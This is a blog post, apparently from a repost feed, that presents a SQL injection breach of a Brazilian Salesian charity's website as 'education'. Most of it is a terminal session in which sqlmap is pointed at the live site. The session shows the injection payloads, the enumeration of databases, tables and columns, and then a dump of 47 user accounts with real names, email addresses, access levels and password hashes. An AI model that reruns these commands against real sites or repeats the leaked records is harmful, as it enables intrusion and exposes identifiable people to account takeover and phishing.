Quantcast
Channel: BOT24
Viewing all articles
Browse latest Browse all 8064

Salesian Mission of Mato Grosso Brazilian Site Breached Via sqlmap Tool (Leak & SQLi Vuln)

$
0
0
As always this information is for educational purposes. We show these compromised systems so that you understand the current threat environment that surrounds us everyday and how significant it is to take the appropriate countermeasures to safeguard your critical data no matter what size your organization is as well as your individual data driven devices. Below is POC of the Exploit. Again as always be proactive not reactive in safeguarding your critical data and stay safe out there. Subsequently as you are aware this blog is provided to the public to offer education in the area of IT security, creating awareness and increasing collaboration so you can implement the appropriate countermeasures such as those described in ISO13335 to prevent yourselves from becoming victims in the current threat environment,

The Breach is provided below as I will continue to monitor the net to safeguard systems and individuals critical data as they should be made aware that their critical info has been leaked onto the Internet in order to protect themselves further. Additionally this information is provided to our readers as an addendum to the California Database Security Breach Act. Please do your part in helping to inform those who have been exploited as you would want others to notify you if your critical data had been compromised. Karma!


The Salesian Mission conducts various projects and actions through colleges and higher education institutions, which contribute to the maintenance of social works, parishes, missions and indigenous works that today have deep roots in the social and cultural life of the State of Mato Grosso , Mato Grosso do Sul and west of Sao Paulo. His performance benefits thousands of children, teenagers, adults, the elderly and the handicapped, the underprivileged social classes, covering all areas of human development and reaching a large part of the population in the region where it operates.The Salesian Mission is a Catholic organization, charitable, educational, cultural and welfare and is today one of the largest Non-Governmental Organizations in the educational and social advancement of youth in these states, with wide acceptance and recognition of the authorities and society in general.



sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:17:15

Usage: python ./sqlmap.py [options]

Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)

  Target:
    At least one of these options has to be specified to set the source to
    get target urls from

    -d DIRECT           Direct connection to the database
    -u URL, --url=URL   Target url
    -l LOGFILE          Parse targets from Burp or WebScarab proxy logs
    -m BULKFILE         Scan multiple targets enlisted in a given textual file
    -r REQUESTFILE      Load HTTP request from a file
    -g GOOGLEDORK       Process Google dork results as target urls
    -c CONFIGFILE       Load options from a configuration INI file

  Request:
    These options can be used to specify how to connect to the target url

    --data=DATA         Data string to be sent through POST
    --param-del=PDEL    Character used for splitting parameter values
    --cookie=COOKIE     HTTP Cookie header
    --load-cookies=LOC  File containing cookies in Netscape/wget format
    --cookie-urlencode  URL Encode generated cookie injections
    --drop-set-cookie   Ignore Set-Cookie header from response
    --user-agent=AGENT  HTTP User-Agent header
    --random-agent      Use randomly selected HTTP User-Agent header
    --randomize=RPARAM  Randomly change value for given parameter(s)
    --force-ssl         Force usage of SSL/HTTPS requests
    --host=HOST         HTTP Host header
    --referer=REFERER   HTTP Referer header
    --headers=HEADERS   Extra headers (e.g. "Accept-Language: fr\nETag: 123")
    --auth-type=ATYPE   HTTP authentication type (Basic, Digest or NTLM)
    --auth-cred=ACRED   HTTP authentication credentials (name:password)
    --auth-cert=ACERT   HTTP authentication certificate (key_file,cert_file)
    --proxy=PROXY       Use a HTTP proxy to connect to the target url
    --proxy-cred=PCRED  HTTP proxy authentication credentials (name:password)
    --ignore-proxy      Ignore system default HTTP proxy
    --delay=DELAY       Delay in seconds between each HTTP request
    --timeout=TIMEOUT   Seconds to wait before timeout connection (default 30)
    --retries=RETRIES   Retries when the connection timeouts (default 3)
    --scope=SCOPE       Regexp to filter targets from provided proxy log
    --safe-url=SAFURL   Url address to visit frequently during testing
    --safe-freq=SAFREQ  Test requests between two visits to a given safe url
    --skip-urlencode    Skip URL encoding of POST data
    --eval=EVALCODE     Evaluate provided Python code before the request (e.g.
                        "import hashlib;id2=hashlib.md5(id).hexdigest()")

  Optimization:
    These options can be used to optimize the performance of sqlmap

    -o                  Turn on all optimization switches
    --predict-output    Predict common queries output
    --keep-alive        Use persistent HTTP(s) connections
    --null-connection   Retrieve page length without actual HTTP response body
    --threads=THREADS   Max number of concurrent HTTP(s) requests (default 1)

  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts

    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
    --os=OS             Force back-end DBMS operating system to this value
    --invalid-bignum    Use big numbers for invalidating values
    --invalid-logical   Use logical operations for invalidating values
    --no-cast           Turn off payload casting mechanism
    --prefix=PREFIX     Injection payload prefix string
    --suffix=SUFFIX     Injection payload suffix string
    --skip=SKIP         Skip testing for given parameter(s)
    --tamper=TAMPER     Use given script(s) for tampering injection data

  Detection:
    These options can be used to specify how to parse and compare page
    content from HTTP responses when using blind SQL injection technique

    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (0-3, default 1)
    --string=STRING     String to match when query is evaluated to True
    --regexp=REGEXP     Regexp to match when query is evaluated to True
    --code=CODE         HTTP code to match when query is evaluated to True
    --text-only         Compare pages based only on the textual content
    --titles            Compare pages based only on their titles

  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques

    --technique=TECH    SQL injection techniques to test for (default "BEUST")
    --time-sec=TIMESEC  Seconds to delay the DBMS response (default 5)
    --union-cols=UCOLS  Range of columns to test for UNION query SQL injection
    --union-char=UCHAR  Character to use for bruteforcing number of columns
    --dns-domain=DNAME  Domain name used for DNS exfiltration attack

  Fingerprint:
    -f, --fingerprint   Perform an extensive DBMS version fingerprint

  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements

    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --is-dba            Detect if the DBMS current user is DBA
    --users             Enumerate DBMS users
    --passwords         Enumerate DBMS users password hashes
    --privileges        Enumerate DBMS users privileges
    --roles             Enumerate DBMS users roles
    --dbs               Enumerate DBMS databases
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --count             Retrieve number of entries for table(s)
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    --search            Search column(s), table(s) and/or database name(s)
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table to enumerate
    -C COL              DBMS database table column to enumerate
    -U USER             DBMS user to enumerate
    --exclude-sysdbs    Exclude DBMS system databases when enumerating tables
    --start=LIMITSTART  First query output entry to retrieve
    --stop=LIMITSTOP    Last query output entry to retrieve
    --first=FIRSTCHAR   First query output word character to retrieve
    --last=LASTCHAR     Last query output word character to retrieve
    --sql-query=QUERY   SQL statement to be executed
    --sql-shell         Prompt for an interactive SQL shell

  Brute force:
    These options can be used to run brute force checks

    --common-tables     Check existence of common tables
    --common-columns    Check existence of common columns

  User-defined function injection:
    These options can be used to create custom user-defined functions

    --udf-inject        Inject custom user-defined functions
    --shared-lib=SHLIB  Local path of the shared library

  File system access:
    These options can be used to access the back-end database management
    system underlying file system

    --file-read=RFILE   Read a file from the back-end DBMS file system
    --file-write=WFILE  Write a local file on the back-end DBMS file system
    --file-dest=DFILE   Back-end DBMS absolute filepath to write to

  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system

    --os-cmd=OSCMD      Execute an operating system command
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an out-of-band shell, meterpreter or VNC
    --os-smbrelay       One click prompt for an OOB shell, meterpreter or VNC
    --os-bof            Stored procedure buffer overflow exploitation
    --priv-esc          Database process' user privilege escalation
    --msf-path=MSFPATH  Local path where Metasploit Framework is installed
    --tmp-path=TMPPATH  Remote absolute path of temporary files directory

  Windows registry access:
    These options can be used to access the back-end database management
    system Windows registry

    --reg-read          Read a Windows registry key value
    --reg-add           Write a Windows registry key value data
    --reg-del           Delete a Windows registry key value
    --reg-key=REGKEY    Windows registry key
    --reg-value=REGVAL  Windows registry key value
    --reg-data=REGDATA  Windows registry key value data
    --reg-type=REGTYPE  Windows registry key value type

  General:
    These options can be used to set some general working parameters

    -t TRAFFICFILE      Log all HTTP traffic into a textual file
    --batch             Never ask for user input, use the default behaviour
    --charset=CHARSET   Force character encoding used for data retrieval
    --check-tor         Check to see if Tor is used properly
    --crawl=CRAWLDEPTH  Crawl the website starting from the target url
    --csv-del=CSVDEL    Delimiting character used in CSV output (default ",")
    --dbms-cred=DCRED   DBMS authentication credentials (user:password)
    --eta               Display for each output the estimated time of arrival
    --flush-session     Flush session files for current target
    --forms             Parse and test forms on target url
    --fresh-queries     Ignores query results stored in session file
    --hex               Uses DBMS hex function(s) for data retrieval
    --output-dir=ODIR   Custom output directory path
    --parse-errors      Parse and display DBMS error messages from responses
    --replicate         Replicate dumped data into a sqlite3 database
    --save              Save options to a configuration INI file
    --tor               Use Tor anonymity network
    --tor-port=TORPORT  Set Tor proxy port other than default
    --tor-type=TORTYPE  Set Tor proxy type (HTTP - default, SOCKS4 or SOCKS5)
    --update            Update sqlmap

  Miscellaneous:
    -z MNEMONICS        Use short mnemonics (e.g. "flu,bat,ban,tec=EU")
    --beep              Sound alert when SQL injection found
    --check-payload     Offline WAF/IPS/IDS payload detection testing
    --check-waf         Check for existence of WAF/IPS/IDS protection
    --cleanup           Clean up the DBMS by sqlmap specific UDF and tables
    --dependencies      Check for missing sqlmap dependencies
    --disable-hash      Disable password hash cracking mechanism
    --disable-like      Disable LIKE search of identificator names
    --gpage=GOOGLEPAGE  Use Google dork results from specified page number
    --mobile            Imitate smartphone through HTTP User-Agent header
    --page-rank         Display page rank (PR) for Google dork results
    --purge-output      Safely remove all content from output directory
    --smart             Conduct through tests only if positive heuristic(s)
    --test-filter=TSTF  Select tests by payloads and/or titles (e.g. ROW)
    --wizard            Simple wizard interface for beginner users

[*] shutting down at 16:17:15

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.missaosalesiana.org.br/albuns.php?id=1 --dbs
    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:17:24

[16:17:24] [INFO] resuming back-end DBMS 'mysql'
[16:17:24] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2205=2205

    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a766f773a,0x487578684b7169635053,0x3a646d763a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[16:17:26] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11
back-end DBMS: MySQL 5.0.11
[16:17:26] [INFO] fetching database names
available databases [2]:
[*] digitalmt10
[*] information_schema

[16:17:26] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.missaosalesiana.org.br'

[*] shutting down at 16:17:26

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.missaosalesiana.org.br/albuns.php?id=1  -D digitalmt10 --tables

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:18:17

[16:18:17] [INFO] resuming back-end DBMS 'mysql'
[16:18:18] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2205=2205

    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a766f773a,0x487578684b7169635053,0x3a646d763a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[16:18:19] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11
back-end DBMS: MySQL 5.0.11
[16:18:19] [INFO] fetching tables for database: 'digitalmt10'
[16:18:21] [WARNING] reflective value(s) found and filtering out
Database: digitalmt10
[62 tables]
+------------------------------------+
| cid_obras                          |
| cidade                             |
| encontro_irmaos                    |
| jornada_salesiana                  |
| mat_backup                         |
| obras                              |
| sem_missionario                    |
| uf                                 |
| w83__excl_proib                    |
| w83__exclusao                      |
| w83_anuario                        |
| w83_anuario_anuario_funcao         |
| w83_anuario_falecio                |
| w83_anuario_funcao                 |
| w83_anuario_governo                |
| w83_anuario_governo_nive           |
| w83_anuario_governo_nivel          |
| w83_anuario_obra                   |
| w83_anuario_obra_anuario_obra_ativ |
| w83_anuario_obra_ativ              |
| w83_banner                         |
| w83_banner_cat                     |
| w83_banner_stats                   |
| w83_chamado_interacaow83           |
| w83_chamado_tipow83                |
| w83_chamadow83                     |
| w83_contadorw83                    |
| w83_contato                        |
| w83_contato_dest                   |
| w83_enquete                        |
| w83_enquete_resps                  |
| w83_enquete_resps_votos            |
| w83_evento                         |
| w83_ferramenta_campo               |
| w83_galeria                        |
| w83_galeria_cat                    |
| w83_galeria_fotos                  |
| w83_grupo                          |
| w83_grupo_assessor                 |
| w83_grupo_ident                    |
| w83_hotsite                        |
| w83_inspetor                       |
| w83_mail_em_grw83                  |
| w83_mail_emw83                     |
| w83_mail_enviow83                  |
| w83_mailw83                        |
| w83_mat                            |
| w83_mat_cat                        |
| w83_mat_sub                        |
| w83_materia                        |
| w83_materia_cat                    |
| w83_materia_coment                 |
| w83_materia_sub                    |
| w83_projeto                        |
| w83_revista                        |
| w83_revista_fotos                  |
| w83_trilha                         |
| w83_trilha_album                   |
| w83_usuario                        |
| w83_usuario_ferramenta             |
| w83_video                          |
| w83_video_cat                      |
+------------------------------------+

[16:18:21] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.missaosalesiana.org.br'

[*] shutting down at 16:18:21

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.missaosalesiana.org.br/albuns.php?id=1  -D digitalmt10 -T w83_usuario --columns

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:20:41

[16:20:41] [INFO] resuming back-end DBMS 'mysql'
[16:20:41] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2205=2205

    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a766f773a,0x487578684b7169635053,0x3a646d763a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[16:20:43] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11
back-end DBMS: MySQL 5.0.11
[16:20:43] [INFO] fetching columns for table 'w83_usuario' in database 'digitalmt10'
[16:20:44] [WARNING] reflective value(s) found and filtering out
Database: digitalmt10
Table: w83_usuario
[10 columns]
+------------+-----------------------+
| Column     | Type                  |
+------------+-----------------------+
| a_anterior | datetime              |
| a_atual    | datetime              |
| bloqueado  | tinyint(1)            |
| email      | varchar(60)           |
| empresa    | varchar(60)           |
| id         | mediumint(4) unsigned |
| nivel      | tinyint(1)            |
| nome       | varchar(50)           |
| senha      | varchar(15)           |
| sexo       | char(1)               |
+------------+-----------------------+

[16:20:44] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.missaosalesiana.org.br'

[*] shutting down at 16:20:44

root@bt:/pentest/database/sqlmap# python sqlmap.py -u http://www.missaosalesiana.org.br/albuns.php?id=1  -D digitalmt10 -T w83_usuario  -C 'email,nivel,nome,senha' --dump

    sqlmap/1.0-dev-25eca9d - automatic SQL injection and database takeover tool
    http://sqlmap.org

[!] legal disclaimer: usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 16:22:38

[16:22:39] [INFO] resuming back-end DBMS 'mysql'
[16:22:39] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 2205=2205

    Type: UNION query
    Title: MySQL UNION query (NULL) - 28 columns
    Payload: id=1 LIMIT 1,1 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, CONCAT(0x3a766f773a,0x487578684b7169635053,0x3a646d763a), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=1 AND SLEEP(5)
---

[16:22:40] [INFO] the back-end DBMS is MySQL

web application technology: Apache 2.2.11
back-end DBMS: MySQL 5.0.11
do you want sqlmap to consider provided column(s):
[1] as LIKE column names (default)
[2] as exact column names
>

[16:22:51] [INFO] fetching columns like 'email, nivel, nome, senha' for table 'w83_usuario' in database 'digitalmt10'
[16:22:52] [WARNING] reflective value(s) found and filtering out
[16:22:52] [INFO] fetching entries of column(s) 'email, nivel, nome, senha' for table 'w83_usuario' in database 'digitalmt10'
[16:22:53] [INFO] analyzing table dump for possible password hashes
Database: digitalmt10
Table: w83_usuario
[47 entries]
+---------------------------------------------+-------+---------------------------------------------+-----------------+
| nome                                        | nivel | email                                       | senha           |
+---------------------------------------------+-------+---------------------------------------------+-----------------+
| \xcanio Chaves Carvalho                     | 4     | enio@digitalmt.com.br                       | 9d962b8164d7b6a |
| Marcelo Arm\xf4a                            | 3     | comunicacao@missaosalesiana.org.br          | 263aad0766ec3c6 |
| Maur\xedcio Mendes Ortiz                    | 3     | mauricio@msmt.org.br                        | 60b43f3afe7757f |
| \xcanio                                     | 4     | enio@pop.com.br                             | 2eb96c1d43b53b2 |
| Recep\xe7\xe3o                              | 3     | recepcao@missaosalesiana.org.br             | ed95e52762ab7bf |
| Gilmar Vieira                               | 2     | ajs@missaosalesiana.org.br                  | 24aa901725e42b2 |
| L\xfadio da Silva                           | 2     | ludio@cdb.br                                | e2fef250410c520 |
| Patricia Geovana da Silva Brito             | 2     | patriciageovanna05@hotmail.com              | 436f2d10ecd8d57 |
| Mauri Silvestre do Couto                    | 2     | cpd@colegiosale.com.br                      | 78b1045c6aea2b4 |
| Osmar Orotides de Resende                   | 2     | osmaresende@hotmail.com                     | 3f9a3a5699e961c |
| Marcel Silvestre do Couto                   | 2     | marcelcouto@gmail.com                       | 1d35346825a6bda |
| Alysson Jos\xe9 de Paula Silva              | 2     | pastoral.cj-tl@missaosalesiana.org.br       | b08fab69aece1a4 |
| Silvia Tada                                 | 2     | silvia@ucdb.br                              | 382558c9ee44f7b |
| Jakson Pereira                              | 2     | jakson@ucdb.br                              | eaeb158b398c40a |
| Cleuza Maria Loubet Cardoso                 | 2     | assistencia.social@missaosalesiana.org.br   | 36cdb2d2d5b5395 |
| Denise Regina Rosa Barbosa                  | 2     | juridico@missaosalesiana.org.br             | fa5ffc337a8a2fc |
| Maikon Luis Malaquias                       | 2     | comunica@salesiano-ata.br                   | 37e13c25f1ea5a8 |
| Ampare                                      | 2     | coordenador.ampare@missaosalesiana.org.br   | d39b0d566e13c16 |
| Tatiana Ri\xe7a                             | 2     | tati.rica@hotmail.com                       | fdcea02e881bcc5 |
| Wellington Aguilar M. Proen\xe7a            | 2     | wamp@santuariomariaauxiliadora.com.br       | ae23953b9e61db8 |
| Luiz Felipe de Souza Jimenez                | 2     | lipe2301@hotmail.com                        | b64cef860cd628f |
| Marcelo de Oliveira Pereira                 | 2     | mop.marcelo@gmail.com                       | 89794b621a313bb |
| Angelo C\xe9sar Cenerin                     | 2     | angelo@centrojuvenil.org.br                 | 04efb69af00d458 |
| Tamiris Riani Silv\xe9rio de Souza          | 2     | tamirissouza@cssg.g12.br                    | e1cb45714c61f62 |
| Tarley da Guia Nunes da Mata                | 2     | tirowa@gmail.com                            | 689ea35f534c3ec |
| Ros\xe2ngela Concei\xe7\xe3o Rodrigues Dias | 2     | rengeldias1@hotmail.com                     | e8a354b6dfe18cc |
| Jo\xe3o Antonio Madalosso J\xfanior         | 2     | madalosso@missaosalesiana.org.br            | 6a73691f33cf775 |
| Carlos Eduardo Rodrigues Or\xe1cio          | 3     | comunicacao08@missaosalesiana.org.br        | 1600dce77266877 |
| Vanderson de Souza Gomes                    | 2     | vanderson@missaosalesiana.org.br            | df026689d7cc2db |
| Israel Rafael Esp\xedndola                  | 2     | comunicacaopsjb@hotmail.com                 | 8551f127f09a851 |
| Luiz Fernando Southier                      | 2     | luizsouthier@gmail.com                      | 39bf05d429d67f0 |
| Euller da Silva                             | 2     | euller@missaosalesiana.org.br               | 634425147a31e0d |
| Vera L\xfacia Desmarest                     | 2     | assistencia.social05@missaosalesiana.org.br | d0150f46158c321 |
| Matheus Lima                                | 2     | matheuslima22@msn.com                       | ea1721f70e71839 |
| Mateus Rezende                              | 2     | mateusrezende.mr@gmail.com                  | 3f883b91bb3195d |
| Mestre Teixeira                             | 3     | economo@missaosalesiana.org.br              | 909adc1236579a6 |
| Jos\xe9 Marcos de Oliveira                  | 2     | josemarcos@missaosalesiana.org.br           | eac0874f66d9bb7 |
| Rafael Zanata Albertini                     | 2     | rafaelalbertini@missaosalesiana.org.br      | e2e60b4317bb269 |
| Jo\xe3o Vitor Aparecido Ortiz               | 2     | joaovitor@missaosalesiana.org.br            | bb5255787864b25 |
| Wilson Roberto Marques                      | 2     | wilson@cssg.g12.br                          | c4ef57dec8a0326 |
| Silvio Andrade                              | 2     | silviopress@terra.com.br                    | 1d7a7c6b50b4f8e |
| Augusto Rodrigues de Souza                  | 2     | augusto@missaosalesiana.org.br              | 42a4b2e7ba0d96f |
| Me. Stivanelli                              | 2     | rafaelcaldato@missaosalesiana.org.br        | d8f837c19d628de |
| Diego Henrique Franco                       | 2     | tecnologia@missaosalesiana.org.br           | 2e75310a0c95ca2 |
| Marcelo Uenaka                              | 2     | marketing@unisalesiano.edu.br               | 1f7acd2e6e1fe1f |
| Rakel Faria Ferreira                        | 2     | rakelfferreira@gmail.com                    | 89794b621a313bb |
| Rafael Gustavo Santos Souza Lopes           | 2     | rafaelgustav@hotmail.com                    | 89794b621a313bb |
+---------------------------------------------+-------+---------------------------------------------+-----------------+

[16:22:53] [INFO] table 'digitalmt10.w83_usuario' dumped to CSV file '/pentest/database/sqlmap/output/www.missaosalesiana.org.br/dump/digitalmt10/w83_usuario.csv'
[16:22:53] [INFO] fetched data logged to text files under '/pentest/database/sqlmap/output/www.missaosalesiana.org.br'

[*] shutting down at 16:22:53

root@bt:/pentest/database/sqlmap#



//The information contained within this publication is
//supplied "as-is"with no warranties or guarantees of fitness
//of use or otherwise. Bot24, Inc nor Bradley Sean Susser accepts
//responsibility for any damage caused by the use or misuse of
//this information



Viewing all articles
Browse latest Browse all 8064

Trending Articles